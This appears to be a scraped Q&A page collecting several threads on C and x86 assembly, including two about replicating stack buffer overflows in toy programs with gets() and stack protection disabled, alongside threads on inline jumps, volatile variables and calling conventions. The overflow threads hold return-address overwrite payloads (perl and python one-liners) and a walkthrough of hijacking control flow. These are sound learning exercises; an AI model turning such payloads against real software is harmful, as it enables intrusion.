Trouble replicating a stack buffer overflow exploit - c

I am having trouble replicating the stack buffer overflow example given by OWASP here.
Here is my attempt:
$ cat test.c
#include <stdio.h>
#include <string.h>
void doit(void)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
}
int main(void)
{
printf("So... The End...\n");
doit();
printf("or... maybe not?\n");
return 0;
}
$ gcc test.c -o test -fno-stack-protection -ggdb
$ objdump -d test # omitted irrelevant parts i think
000000000040054c <doit>:
40054c: 55 push %rbp
40054d: 48 89 e5 mov %rsp,%rbp
400550: 48 83 ec 10 sub $0x10,%rsp
400554: 48 8d 45 f0 lea -0x10(%rbp),%rax
400558: 48 89 c7 mov %rax,%rdi
40055b: e8 d0 fe ff ff callq 400430 <gets#plt>
400560: 48 8d 45 f0 lea -0x10(%rbp),%rax
400564: 48 89 c7 mov %rax,%rdi
400567: e8 a4 fe ff ff callq 400410 <puts#plt>
40056c: c9 leaveq
40056d: c3 retq
000000000040056e <main>:
40056e: 55 push %rbp
40056f: 48 89 e5 mov %rsp,%rbp
400572: bf 4c 06 40 00 mov $0x40064c,%edi
400577: e8 94 fe ff ff callq 400410 <puts#plt>
40057c: e8 cb ff ff ff callq 40054c <doit>
400581: bf 5d 06 40 00 mov $0x40065d,%edi
400586: e8 85 fe ff ff callq 400410 <puts#plt>
40058b: b8 00 00 00 00 mov $0x0,%eax
400590: 5d pop %rbp
400591: c3 retq # this is where i took my overflow value from
400592: 90 nop
400593: 90 nop
400594: 90 nop
400595: 90 nop
400596: 90 nop
400597: 90 nop
400598: 90 nop
400599: 90 nop
40059a: 90 nop
40059b: 90 nop
40059c: 90 nop
40059d: 90 nop
40059e: 90 nop
40059f: 90 nop
$ perl -e 'print "A"x12 ."\x91\x05\x40"' | ./test
So... The End...
AAAAAAAAAAAA▒#
or... maybe not? # this shouldn't be outputted
Why isn't this working? I'm assuming that the memory address that I am supposed to insert is the retq from <main>.
My goal is to figure out how to do a stack buffer overflow that calls a function elsewhere in the program. Any help is much appreciated. :)

I'm using Windows & MSVC but you should get the idea.
Consider the following code:
#include <stdio.h>
void someFunc()
{
puts("wow, we should never get here :|");
}
// MSVC inlines this otherwise
void __declspec(noinline) doit(void)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
}
int main(void)
{
printf("So... The End...\n");
doit();
printf("or... maybe not?\n");
return 0;
}
(Note: I had to compile it with /OPT:NOREF to force MSVC not to remove "unused" code and /GS- to turn off stack checks)
Now, let's open it in my favorite disassembler:
We'd like to exploit the gets vulnerability so the execution jumps to someFunc. We can see that its address is 001D1000, so if we can write enough bytes past the buffer to overwrite the return address, we'll be good. Let's take a look at the stack when gets is called:
As we can see, there's 8 bytes of our stack allocated buffer (buf), 4 bytes of some stuff (actually the PUSHed EBP), and the return address. Thus, we need to write 12 bytes of whatever and then our 4 byte return address (001D1000) to "hijack" the execution flow. Let's do just that - we'll prepare an input file with the bytes we need using a hex editor:
And indeed, when we run the program with that input, we get this:
After it prints that line, it will crash with an access violation since there was some garbage on the stack. However, there's nothing stopping you from carefully analyzing the code and preparing such bytes in your input that the program will appear to function as normal (we could overwrite the next bytes with the address of ExitProcess, so that someFunc would jump there).

Related

Segmentation fault inline jmp [duplicate]

This question already has answers here:
Segmentation fault in C and infinite loop - self calling main function
(4 answers)
Is there a limit of stack size of a process in linux
(4 answers)
GCC Inline Assembly: Jump to label outside block
(2 answers)
How does linux know when to allocate more pages to a call stack?
(1 answer)
How is Stack memory allocated when using 'push' or 'sub' x86 instructions?
(2 answers)
Closed 1 year ago.
I was playing with inline assembly, and I've noticed something strange. I've written a program which calls a wrapper function of jmp and executes in loop:
#include <stdint.h>
void asm_jmp(void* address)
{
__asm__("jmp\t*%%rax"
:
:"a" (address)
:);
}
int main()
{
asm_jmp(&main + 4);
}
I've opened it with gdb and I noticed it iterates hundreds and hundreds of times before giving segmentation fault. Maybe I'm missing something, but I don't see where there could be a problem in this program which causes it to segfault.
Initially I thought that calling asm_jmp in loop saturated the stack, since each call adds an address onto the stack, but there is no return to free the space occupied by that address. Is this the problem? Or there's something else?
Here is the assembly obtained with objdump:
0000000000001119 <asm_jmp>:
1119: 55 push %rbp
111a: 48 89 e5 mov %rsp,%rbp
111d: 48 89 7d f8 mov %rdi,-0x8(%rbp)
1121: 48 8b 45 f8 mov -0x8(%rbp),%rax
1125: ff e0 jmp *%rax
1127: 90 nop
1128: 5d pop %rbp
1129: c3 ret
000000000000112a <main>:
112a: 55 push %rbp
112b: 48 89 e5 mov %rsp,%rbp
112e: 48 8d 05 0d 00 00 00 lea 0xd(%rip),%rax # 1142 <main+0x18>
1135: 48 89 c7 mov %rax,%rdi
1138: e8 dc ff ff ff call 1119 <asm_jmp>
113d: b8 00 00 00 00 mov $0x0,%eax
1142: 5d pop %rbp
1143: c3 ret
1144: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
114b: 00 00 00
114e: 66 90 xchg %ax,%ax

C/C++ volatile variable accessed from another module

I know and understand the purpose of volatile variables and optimisation in general (well, I think I do!). This question relates specifically to what happens if a variable is accessed outside the module it is declared in.
In the following scenario, if funcThatWaits was called inside bar.c, it could be optimised and not fetch the value of sTheVar each loop iteration.
However, when GetTheVar is called externally could the same optimisation apply or does the function call ensure sTheVar will always be read each loop iteration?
I am not suggesting this is good code or practice, but an example for the sake of the question.
bar.h
int GetTheVar(void);
bar.c
static /*volatile*/ int sTheVar;
int GetTheVar(void)
{
return sTheVar;
}
static void someISROrFuncCalledFromAnotherThread(void)
{
sTheVar = 1;
}
foo.c
#include "bar.h"
void funcThatWaits(void)
{
while(GetTheVar() != 1) {}
}
when GetTheVar is called externally could the same optimisation apply or does the function call ensure sTheVar will always be read each loop iteration?
The same optimization may apply. For instance, if you are using LTO (Link-Time Optimization), then the compiler knows everything about GetTheVar and will likely decide funcThatWaits is an infinite loop (which, by the way, would be UB).
Function calls are not going to be optimized away since, for all the caller knows, the function being called could depend on some exogenous state.
I compiled the following three files using gcc:
foo.c
#include "bar.h"
void funcThatWaits(void) {
while ( getVar() != 1 );
}
bar.c
#include "foo.h"
static int theVar;
int getTheVar(void) {
return theVar;
}
void theFunc(void) {
funcThatWaits();
}
test.c
#include "bar.h"
int main() {
theFunc();
return 0;
}
Compiling those three into a.out and running objdump -d a.out, the following comes out:
00000000000005fa <main>:
5fa: 55 push %rbp
5fb: 48 89 e5 mov %rsp,%rbp
5fe: e8 25 00 00 00 callq 628 <theFunc>
603: b8 00 00 00 00 mov $0x0,%eax
608: 5d pop %rbp
609: c3 retq
000000000000060a <funcThatWaits>:
60a: 55 push %rbp
60b: 48 89 e5 mov %rsp,%rbp
60e: 90 nop
60f: e8 08 00 00 00 callq 61c <getTheVar>
614: 83 f8 01 cmp $0x1,%eax
617: 75 f6 jne 60f <funcThatWaits+0x5>
619: 90 nop
61a: 5d pop %rbp
61b: c3 retq
000000000000061c <getTheVar>:
61c: 55 push %rbp
61d: 48 89 e5 mov %rsp,%rbp
620: 8b 05 ee 09 20 00 mov 0x2009ee(%rip),%eax # 201014 <theVar>
626: 5d pop %rbp
627: c3 retq
0000000000000628 <theFunc>:
628: 55 push %rbp
629: 48 89 e5 mov %rsp,%rbp
62c: e8 d9 ff ff ff callq 60a <funcThatWaits>
631: 90 nop
632: 5d pop %rbp
633: c3 retq
634: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
63b: 00 00 00
63e: 66 90 xchg %ax,%ax

exploiting Buffer Overflow using gets() in a simple C program

I am new to Buffer Overflow exploits and I started with a simple C program.
Code
#include <stdio.h>
#include <strings.h>
void execs(void){
printf("yay!!");
}
void return_input (void)
{
char array[30];
gets(array);
}
int main()
{
return_input();
return 0;
}
Compilation stage
I compiled the above program with cc by disabling stack protector as:
cc test.c -o test -fno-stack-protector
The dump of the elf file using objdump is as follows :
0804843b <execs>:
804843b: 55 push %ebp
804843c: 89 e5 mov %esp,%ebp
804843e: 83 ec 08 sub $0x8,%esp
8048441: 83 ec 0c sub $0xc,%esp
8048444: 68 10 85 04 08 push $0x8048510
8048449: e8 b2 fe ff ff call 8048300 <printf#plt>
804844e: 83 c4 10 add $0x10,%esp
8048451: 90 nop
8048452: c9 leave
8048453: c3 ret
08048454 <return_input>:
8048454: 55 push %ebp
8048455: 89 e5 mov %esp,%ebp
8048457: 83 ec 28 sub $0x28,%esp
804845a: 83 ec 0c sub $0xc,%esp
804845d: 8d 45 da lea -0x26(%ebp),%eax
8048460: 50 push %eax
8048461: e8 aa fe ff ff call 8048310 <gets#plt>
8048466: 83 c4 10 add $0x10,%esp
8048469: 90 nop
804846a: c9 leave
804846b: c3 ret
0804846c <main>:
804846c: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048470: 83 e4 f0 and $0xfffffff0,%esp
8048473: ff 71 fc pushl -0x4(%ecx)
8048476: 55 push %ebp
8048477: 89 e5 mov %esp,%ebp
8048479: 51 push %ecx
804847a: 83 ec 04 sub $0x4,%esp
804847d: e8 d2 ff ff ff call 8048454 <return_input>
8048482: b8 00 00 00 00 mov $0x0,%eax
8048487: 83 c4 04 add $0x4,%esp
804848a: 59 pop %ecx
804848b: 5d pop %ebp
804848c: 8d 61 fc lea -0x4(%ecx),%esp
804848f: c3 ret
So, In order to exploit the buffer(array), we need to find the number of bytes allocated in the return_input stack frame which by looking at the dump,
lea -0x26(%ebp),%eax
is 0x26 in hex or roughly 38 in decimal. So, giving input as :
38+4(random chars)+(return addr of execs)
would execute the execs function. I used the following:
python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test
But output Error was:
Segmentation fault(core dumped)
When I opened the core(core dumped file) using gdb, I could find that the segmentation fault was experienced when executing on the following address :
0xb76f2300
System information:
Ubuntu version : 16.10
Kernel version : 4.8.0-46-generic
Question?
What was I doing wrong in code?
I guess the reason is simple: you didn't halt/abort your program in the execs. That address 0xb76f2300 is on stack, so I suspect it is the return from the execs that fails when it tries to return to the value of the stored stack pointer.
That you don't see any message is because the stdout is line-buffered, and your message didn't have a new-line character, nor did you flush it explicitly; thus the yay!! will still be in the buffers.
Also, use a debugger.

Understanding how parameters are passed to functions in Assembly

I am reading this writeup on how to perform a ret2libc exploit. It states that the arguments passed to a function are stored at ebp+8.
Now, if I take a simple C program
#include <stdlib.h>
int main() {
system("/bin/sh");
}
And compile it:
gcc -m32 -o test_sh test_sh.c
and look at the disassembly of it with
objdump -d -M intel test_sh
0804840b <main>:
804840b: 8d 4c 24 04 lea ecx,[esp+0x4]
804840f: 83 e4 f0 and esp,0xfffffff0
8048412: ff 71 fc push DWORD PTR [ecx-0x4]
8048415: 55 push ebp
8048416: 89 e5 mov ebp,esp
8048418: 51 push ecx
8048419: 83 ec 04 sub esp,0x4
804841c: 83 ec 0c sub esp,0xc
804841f: 68 c4 84 04 08 push 0x80484c4
8048424: e8 b7 fe ff ff call 80482e0 <system#plt>
8048429: 83 c4 10 add esp,0x10
804842c: b8 00 00 00 00 mov eax,0x0
8048431: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]
8048434: c9 leave
8048435: 8d 61 fc lea esp,[ecx-0x4]
8048438: c3 ret
8048439: 66 90 xchg ax,ax
804843b: 66 90 xchg ax,ax
804843d: 66 90 xchg ax,ax
804843f: 90 nop
The line
804841f: 68 c4 84 04 08 push 0x80484c4
Pushes the address of the string "/bin/sh" onto the stack. Immediately afterwards the system#plt function is called. So how does one arrive to ebp+8 from the above output?
Help would be appreciated!
The arguments passed to a function are stored at ebp+8.
That's from the called function's point of view, not from the calling function's point of view. The calling function has its own arguments at ebp+8, and your main() does not use any of its arguments, hence, you don't see any use of ebp+8 in your main().
You can see ebp+8 being used as follows:
Try writing a second function, with arguments, and calling it from main(), instead of invoking system(). You still won't see any use of ebp+8 within main(), but you will see it being used in your second function.
Try declaring your main() to accept its char** argv argument, then try sending argv[0] to printf().
You don't because EBP + 8 is only relevant after the prologue in system#plt after creating a new procedure frame.
push ebp
mov ebp, esp
at this point in system#plt the contents of memory location pointed to by EBP + 8 will equal 0x80484C4.

Try to understand calling process in assembly code

I wrote a very simple program in C and try to understand the function calling process.
#include "stdio.h"
void Oh(unsigned x) {
printf("%u\n", x);
}
int main(int argc, char const *argv[])
{
Oh(0x67611c8c);
return 0;
}
And its assembly code seems to be
0000000100000f20 <_Oh>:
100000f20: 55 push %rbp
100000f21: 48 89 e5 mov %rsp,%rbp
100000f24: 48 83 ec 10 sub $0x10,%rsp
100000f28: 48 8d 05 6b 00 00 00 lea 0x6b(%rip),%rax # 100000f9a <_printf$stub+0x20>
100000f2f: 89 7d fc mov %edi,-0x4(%rbp)
100000f32: 8b 75 fc mov -0x4(%rbp),%esi
100000f35: 48 89 c7 mov %rax,%rdi
100000f38: b0 00 mov $0x0,%al
100000f3a: e8 3b 00 00 00 callq 100000f7a <_printf$stub>
100000f3f: 89 45 f8 mov %eax,-0x8(%rbp)
100000f42: 48 83 c4 10 add $0x10,%rsp
100000f46: 5d pop %rbp
100000f47: c3 retq
100000f48: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
100000f4f: 00
0000000100000f50 <_main>:
100000f50: 55 push %rbp
100000f51: 48 89 e5 mov %rsp,%rbp
100000f54: 48 83 ec 10 sub $0x10,%rsp
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
100000f72: 31 c0 xor %eax,%eax
100000f74: 48 83 c4 10 add $0x10,%rsp
100000f78: 5d pop %rbp
100000f79: c3 retq
Well, I don't quite understand the argument passing process, since there is only one parameter passed to Oh function, I could under stand this
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
So what does the the code below do? Why rbp? Isn't it abandoned in X86-64 assembly? If it is a x86 style assembly, how can I generate the x86-64 style assembly using clang? If it is x86, it doesn't matter, could any one explains the below code line by line for me?
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
You might get cleaner code if you turned optimizations on, or you might not. But, here’s what that does.
The %rbp register is being used as a frame pointer, that is, a pointer to the original top of the stack. It’s saved on the stack, stored, and restored at the end. Far from being removed in x86_64, it was added there; the 32-bit equivalent was %ebp.
After this value is saved, the program allocates sixteen bytes off the stack by subtracting from the stack pointer.
There then is a very inefficient series of copies that sets the first argument of Oh() as the second argument of printf() and the constant address of the format string (relative to the instruction pointer) as the first argument of printf(). Remember that, in this calling convention, the first argument is passed in %rdi (or %edi for 32-bit operands) and the second in %rsi This could have been simplified to two instructions.
After calling printf(), the program (needlessly) saves the return value on the stack, restores the stack and frame pointers, and returns.
In main(), there’s similar code to set up the stack frame, then the program saves argc and argv (needlessly), then it moves around the constant argument to Oh into its first argument, by way of %eax. This could have been optimized into a single instruction. It then calls Oh(). On return, it sets its return value to 0, cleans up the stack, and returns.
The code you’re asking about does the following: stores the constant 32-bit value 0 on the stack, saves the 32-bit value argc on the stack, saves the 64-bit pointer argv on the stack (the first and second arguments to main()), and sets the first argument of the function it is about to call to %eax, which it had previously loaded with a constant. This is all unnecessary for this program, but would have been necessary had it needed to use argc and argv after the call, when those registers would have been clobbered. There’s no good reason it used two steps to load the constant instead of one.
As Jester mentions you still have frame pointers on (to aid debugging)so stepping through main:
0000000100000f50 <_main>:
First we enter a new stack frame, we have to save the base pointer and move the stack to the new base. Also, in x86_64 the stack frame has to be aligned to a 16 byte boundary (hence moving the stack pointer by 0x10).
100000f50: push %rbp
100000f51: mov %rsp,%rbp
100000f54: sub $0x10,%rsp
As you mention, x86_64 passes parameters by register, so load the param in to the register:
100000f58: mov $0x67611c8c,%eax
??? Help needed
100000f5d: movl $0x0,-0x4(%rbp)
From here: "Registers RBP, RBX, and R12-R15 are callee-save registers", so if we want to save other resisters then we have to do it ourselves ....
100000f64: mov %edi,-0x8(%rbp)
100000f67: mov %rsi,-0x10(%rbp)
Not really sure why we didn't just load this in %edi where it needs to be for the call to begin with, but we better move it there now.
100000f6b: mov %eax,%edi
Call the function:
100000f6d: callq 100000f20 <_Oh>
This is the return value (passed in %eax), xor is a smaller instruction than load 0, so is a cmmon optimization:
100000f72: xor %eax,%eax
Clean up that stack frame we added earlier (not really sure why we saved those registers on it when we didn't use them)
100000f74: add $0x10,%rsp
100000f78: pop %rbp
100000f79: retq

Resources